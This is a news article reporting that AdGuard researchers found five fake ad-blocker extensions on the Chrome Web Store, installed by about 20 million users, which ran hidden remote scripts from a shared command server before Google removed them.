Research unearths five malicious ad-blocker extensions on the Chrome Web Store that were installed by 20 million Chrome users before Google removed them.
The bogus ad blockers were discovered by researchers at AdGuard, a Moscow-based maker of ad-blocking and anti-tracking tech.
Following AdGuard’s report on the fake ad blockers in the Chrome Web Store, Google removed the suspect extensions, which have been installed on 20 million Chrome instances over the past year.
The most popular fake ad blocker was AdRemover for Google Chrome, which had over 10 million users, putting a massive botnet of infected browsers at its authors’ disposal.
“Basically, this is a botnet composed of browsers infected with the fake ad-block extensions. The browser will do whatever the command-center server owner orders it to do,” wrote AdGuard co-founder Andrey Meshkov.
Cloning legitimate ad blockers, adding malicious features and distributing them in the Chrome store has become a popular tactic for cybercriminals. Last year security personality SwiftOnSecurity discovered a fake Adblock Plus Chrome extension that tricked 37,000 users into installing it.
Meshkov says the main problem is that extensions are poorly vetted by the Chrome Web Store. The authors of fake extensions are also using keyword spam in the extension description to get a top ranking in the Chrome Web Store for searches for ‘adblocker’.
“Instead of using tricky names, they now spam keywords in the extension description to try to make the top search results,” wrote Meshkov.
There were two other fake ad blockers — ripped off from legitimate ad-blocking code: a fake uBlock Plus with eight million users, and a fake Adblock Pro with two million users. Two more cloned extensions that used similar tactics were HD for YouTube with 400,000 users and Webutation, which has 30,000 users.
A Reddit user in October noticed the same clone of the uBlock Plus extension Meshkov found, meaning they’ve been available on the Chrome Web Store for at least six months. This fact, along with top ranking for queries for ad blocker, explains how the extensions attracted so many users.
Meshkov found that the fake AdRemover for Google Chrome included hidden scripts that allow the authors to track websites visited and alter browser behavior.
“They definitely could alter anything on any website if they receive such command from the command server,” Meshkov said.
“Also, all five were connecting to the very same command server, and they were using the very same approach — the remote script was hidden inside an image.”
The good news is that after Google removed the extensions from the Chrome Web Store the extensions have been disabled on Chrome instances with them installed.
“Google is able to disable and remove Chrome extensions remotely and it seems that this is exactly what’s happening,” added Meshkov.